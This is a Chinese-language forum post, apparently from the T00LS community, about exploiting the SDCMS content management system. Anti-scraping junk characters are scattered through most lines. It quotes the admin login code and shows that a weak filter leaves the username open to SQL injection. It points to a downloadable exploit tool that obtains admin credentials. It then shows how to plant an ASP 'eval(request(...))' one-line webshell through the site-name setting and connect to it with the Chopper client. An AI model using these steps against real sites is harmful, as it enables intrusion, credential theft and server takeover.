作者:T00LS 鬼哥2 V3 n% k/ `4 D% c9 T/ Y5 M% Q- o$ Q
漏洞文件:后台目录/index.asp$ N& t& v7 m/ v+ T; k8 \
0 @& W* T. V) ?, z7 G4 K h
Sub Check
+ |' M6 T" Y. j; [0 y. C1 @ Dim username,password,code,getcode,Rs
1 q5 W1 @" E% Q0 ^/ r IF Check_post Then Echo "1禁止从外部提交数据!":Exit Sub# ?! G* [) G7 j% q) |
username=FilterText(Trim(Request.Form("username")),1)* s$ G& ]! D3 c; M5 Z- h. q( p
password=FilterText(Trim(Request.Form("password")),1)% t! c" a" n! \5 ?: Y- R9 c! R4 h: m
code=Trim(Request.Form("yzm"))! X# g% l9 Z, C% p# e: _
getcode=Session("SDCMSCode")
8 {! c o: w8 B IF errnum>=loginnum Then Echo "系统已禁止您今日再登录":died
. K7 y: s0 k$ Z, G9 ]( D IF code="" Then Alert "验证码不能为空!","javascript:history.go(-1)" ied
5 n* i" o8 x ]9 B( B IF code<>"" And Not Isnumeric(code) Then Alert "验证码必须为数字!","javascript:history.go(-1)" ied
I5 B7 D6 r" a4 b+ j. \" J$ X IF code<>getcode Then Alert "验证码错误!","javascript:history.go(-1)" ied( {( l8 T# E; \
IF username="" or password="" Then
1 y( h- U+ V3 w5 S; ` Echo "用户名或密码不能为空" ied
- |4 x4 q' a' {" B3 Z8 K/ ?2 j Else
' t( ~7 U: Q8 R) t# a0 f Set Rs=Conn.Execute("Select Id,Sdcms_Name,Sdcms_Pwd,isadmin,alllever,infolever From Sd_Admin Where Sdcms_name='"&username&"' And Sdcms_Pwd='"&md5(password)&"'")
T; }+ J; o' G6 x7 h IF Rs.Eof Then
) I% h6 k" j$ X, x4 f% B" ] AddLog username,GetIp,"登录失败",1
' W; @' Z4 q5 l4 K1 p" E# L; | Echo "用户名或密码错误,今日还有 "&loginnum-errnum&" 次机会"
. D( T3 ~1 B5 {: |1 I7 o Else) J) f, v, J8 k) r# {2 I& X3 b0 |
Add_Cookies "sdcms_id",Rs(0): b* k3 g- a- r+ w$ S3 t. R
Add_Cookies "sdcms_name",username- W2 S7 x. R9 E; y3 y6 ]% S
Add_Cookies "sdcms_pwd",Rs(2)# }5 w. l/ P0 \7 \* [+ H
Add_Cookies "sdcms_admin",Rs(3)
& G8 _! q% e: f; w& ] Add_Cookies "sdcms_alllever",Rs(4)
# R4 n3 D' E6 c# M' v, X* T' O Add_Cookies "sdcms_infolever",Rs(5)3 H* ~* ]; T6 i- x+ a9 X! V
Conn.Execute("Update Sd_Admin Set logintimes=logintimes+1,LastIp='"&GetIp&"' Where id="&Rs(0)&"")
$ l2 a( U/ Y; }) A0 C AddLog username,GetIp,"登录成功",1
8 {+ H% o$ j' o '自动删除30天前的Log记录
2 V/ B6 I7 D0 D2 \) k) j7 I* L IF Sdcms_DataType Then
) z/ Q5 {, Y; p+ l" P Conn.Execute("Delete From Sd_Log Where DateDiff('d',adddate,Now())>30")& a+ t* P# p9 b9 d5 j$ q
Else6 ?! v0 w0 \: K* P" n M
Conn.Execute("Delete From Sd_Log Where DateDiff(d,adddate,GetDate())>30"). Q7 \5 H2 P. R9 D9 A. E
End IF
0 J9 Q1 G: |( R* V: D Go("sdcms_index.asp")
8 W$ {+ }. o Q( A1 b' e1 { End IF }$ P. U& K) F1 c
Rs.Close
/ S, g' O8 i$ e: }3 L Set Rs=Nothing5 `4 _' f) g* S9 w
End IF
' U1 {0 X7 \" i/ {9 g1 a% |End Sub
% d3 |- {4 {& g& x3 M8 \" i4 W
# D, O ~+ B0 v) V’我们可以看到username是通过FilterText来过滤的。我们看看FilterText的代码! h. p% y( P4 ~) B3 s2 F% P
! I! t2 l) D& s9 Q B K
Function FilterText(ByVal t0,ByVal t1)) p- l+ M( k) w5 P, I
IF Len(t0)=0 Or IsNull(t0) Or IsArray(t0) Then FilterText="":Exit Function
/ j( w, v0 w; `! c6 |8 J t0=Trim(t0)
9 V5 J1 U, w. I3 x1 S1 I/ A9 W% s$ {3 ^ Select Case t1
. k7 E& {1 q* r7 w Case "1"! ?: _+ Q; D* B. u9 Z m" n& K
t0=Replace(t0,Chr(32),"")9 D$ _2 K }, N% h* g
t0=Replace(t0,Chr(13),"")2 T6 v8 D$ X! J/ _/ Z3 f
t0=Replace(t0,Chr(10)&Chr(10),"")7 v& {0 n+ F7 o0 [% c0 ^
t0=Replace(t0,Chr(10),""). f- J' G5 i3 i k E9 G
Case "2"0 \6 |$ v2 ^ w/ z5 i2 L
t0=Replace(t0,Chr(8),"")'回格
% D5 q. @: l, q* S+ i* C t0=Replace(t0,Chr(9),"")'tab(水平制表符)% L8 E* C4 `: p) U- @/ }0 ^
t0=Replace(t0,Chr(10),"")'换行4 I# [" A3 g8 h( V& B
t0=Replace(t0,Chr(11),"")'tab(垂直制表符)
/ m. X1 y: v# ~3 n" A t0=Replace(t0,Chr(12),"")'换页. h; N" U. t p) A+ s9 A' g
t0=Replace(t0,Chr(13),"")'回车 chr(13)&chr(10) 回车和换行的组合
2 h% O i+ N8 p0 N6 o- C t0=Replace(t0,Chr(22),""). A( I/ r0 X, Z l; [! U# c) D
t0=Replace(t0,Chr(32),"")'空格 SPACE
# u+ ?) y6 m/ g t0=Replace(t0,Chr(33),"")'!" m5 o" z+ b& A& i# Y
t0=Replace(t0,Chr(34),"")'"8 G3 W6 N. l V9 R5 ~0 ?6 c
t0=Replace(t0,Chr(35),"")'#+ Z( _- h$ a/ z i
t0=Replace(t0,Chr(36),"")'$
7 u# s. x$ z5 C t0=Replace(t0,Chr(37),"")'%8 b2 @! J5 X$ H9 J9 o: q7 D* q
t0=Replace(t0,Chr(38),"")'&- U2 ?3 q/ j; T+ I: J) E
t0=Replace(t0,Chr(39),"")''$ [) s+ @, w K) m0 K9 O8 |0 r4 T! @
t0=Replace(t0,Chr(40),"")'(
* V8 m- J3 @7 c% l t0=Replace(t0,Chr(41),"")')" m3 j, c% W9 P5 K4 H1 W
t0=Replace(t0,Chr(42),"")'*
) S% \8 U! X7 \. h/ e; t t0=Replace(t0,Chr(43),"")'+
1 s0 r0 u! J5 A! O9 Q t0=Replace(t0,Chr(44),"")'," U/ N4 a$ ?; l" x# g
t0=Replace(t0,Chr(45),"")'-0 B9 |1 u) T2 w5 c; \$ G
t0=Replace(t0,Chr(46),"")'. f! ]0 A% z+ H) K# v
t0=Replace(t0,Chr(47),"")'/
7 V3 [: D1 b/ w" D- s: t I t0=Replace(t0,Chr(58),"")':/ g `$ `5 ?, x3 b7 Y
t0=Replace(t0,Chr(59),"")';$ a/ B4 T: z4 m" }$ l7 {
t0=Replace(t0,Chr(60),"")'< t0=Replace(t0,Chr(61),"")'= t0=Replace(t0,Chr(62),"")'>
$ L4 V) }. O, H# | t0=Replace(t0,Chr(63),"")'?# d9 D/ k. v# A9 }) R' i
t0=Replace(t0,Chr(64),"")'@5 V3 z! m. V0 x$ \' I
t0=Replace(t0,Chr(91),"")'\
( i; F9 n1 N* m* e( a t0=Replace(t0,Chr(92),"")'\
3 i7 Y$ j8 o7 Z0 O7 x t0=Replace(t0,Chr(93),"")']
# H) x4 ~0 M M0 O/ v$ e9 Y t0=Replace(t0,Chr(94),"")'^
`" I6 e2 u5 g/ Y t0=Replace(t0,Chr(95),"")'_
4 F5 w2 A! I) p l) \' e( @ t0=Replace(t0,Chr(96),"")'`
+ G9 Q! X- c0 a: O. K t0=Replace(t0,Chr(123),"")'{
. y( `9 W, @- l$ W' f4 P t0=Replace(t0,Chr(124),"")'|4 Z; b- Z4 U- J& m" B/ C" |
t0=Replace(t0,Chr(125),"")'}- z! i0 A \, \/ j0 @$ l
t0=Replace(t0,Chr(126),"")'~4 g2 V I. j3 @/ K1 |2 n( m
Case Else
& ^: K8 \% r% i# Z t0=Replace(t0, "&", "&")5 s( {' @7 H! }+ W' P9 ^; q
t0=Replace(t0, "'", "'")
! w9 L3 M( G5 P- p/ W' T, [ t0=Replace(t0, """", """)0 v& v5 c% y) G3 g
t0=Replace(t0, "<", "<") t0=Replace(t0, ">", ">")) i6 q, ^$ E* f! N+ L6 a+ S
End Select
8 a+ {4 o6 [9 k8 ?( Z$ Z. i IF Instr(Lcase(t0),"expression")>0 Then2 p, T. @2 p& J; [5 Y2 Z, h$ H( ^
t0=Replace(t0,"expression","e­xpression", 1, -1, 0)
! g: X; o0 H/ y1 |0 E End If
5 \. R! e6 Y& ? FilterText=t0
0 r; D2 J& q7 o4 `* r" i0 H! ~End Function
# R4 \$ \7 w- |; l* h# x0 a7 H2 o N6 I8 Z7 d) t; |
看到没。直接参数是1 只过滤
: G+ J! }7 l9 \ t0=Replace(t0,Chr(32)," ")
2 R& h9 H0 ?$ v8 u1 D$ G t0=Replace(t0,Chr(13),"")
5 [" ^% {1 R) L- { t0=Replace(t0,Chr(10)&Chr(10),"
I4 p5 u8 d% q/ o")9 ^; w; C, }& p6 i7 W
t0=Replace(t0,Chr(10),"
5 D7 Q. R* F) @")3 b1 p! K! B( x$ u
漏洞导致可以直接拿到后台帐号密码。SDCMS默认后台地址/admin/如果站长改了后台路径,那么请自行查找!3 {, N8 M" T$ f) R
EXP利用工具下载 (此工具只能在XP上运行):sdcms-EXP
4 n/ D; v3 g; Q4 _& L# R4 C- G0 U Y! E$ y
测试:
+ F9 P9 e$ {! d/ d; U% m; X" ^# d$ U1 m6 o/ _
2 O" T! {$ u" d. v
现在输入工具上验证码,然后点OK
r: w( w2 k$ g* X0 b' X0 A# ?7 j- q# T0 H; C* P [+ W
/ c3 q' [3 S0 N: |8 ~8 O' G看到我们直接进入后台管理界面了,呵呵!/ u& H# f3 y* K1 h
$ s5 g% E* U1 C( E9 w+ \4 k4 C' V/ ]7 z$ K- z* z8 W
& Z9 y7 V' V! r3 X |1 {* F
这样直接进入后台了。。。。
8 w1 U# Q* ~. G4 l: y! c6 p: G, F7 \# M
, ], b$ ~2 C# I8 M9 l) u
' r+ J8 M# L. P& g. LSDCMS提权:8 ~& B5 U' B: m. S8 A
8 `& |/ O1 X, u/ S: g
方法1:访问:/后台目录/sdcms_set.asp 在 网站名称:后面加个 “:eval(request(Chr(63)))’ 即可,直接写一句话进去。 写入到/inc/Const.asp 一句话连接密码是?# a+ D( D2 Y1 V$ m6 @8 j
( V, W. l; ]2 |, _
$ P+ N7 B: O( }' P
6 K/ E3 X7 {' V X/ lOK,现在用菜刀连接下!8 W0 e- F- I* P7 i- G; H9 w% f
4 \5 [) E, Q! l0 X8 V
a- `/ y" t& X+ L
9 Z4 m! H9 L7 X& n7 U 0 @- g6 ]' y1 o
7 r- o+ X3 L4 F
|